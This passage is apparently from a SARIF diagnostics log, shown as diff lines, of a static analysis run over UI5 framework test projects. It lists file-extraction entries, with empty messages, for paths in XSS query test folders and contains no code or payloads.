"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 287 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 288 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 290 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ 
{ - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 291 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 292 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 293 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 294 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - 
"text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 295 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 296 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 297 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 298 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - 
"properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 299 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 300 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 301 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 302 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" 
: { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 303 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 304 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 305 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 306 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, 
- "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 307 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 308 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 309 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 310 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" 
: { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 312 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 313 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 314 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - 
} - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 316 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 317 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 318 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 320 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 321 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 322 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 324 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 325 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 326 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 328 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 329 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 330 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 332 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 333 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 334 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 335 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 336 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 337 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 338 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 339 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 340 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 341 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 342 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", - "uriBaseId" : "%SRCROOT%", - "index" : 344 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 345 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 346 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - 
"uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 347 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 349 - } - } - } ], 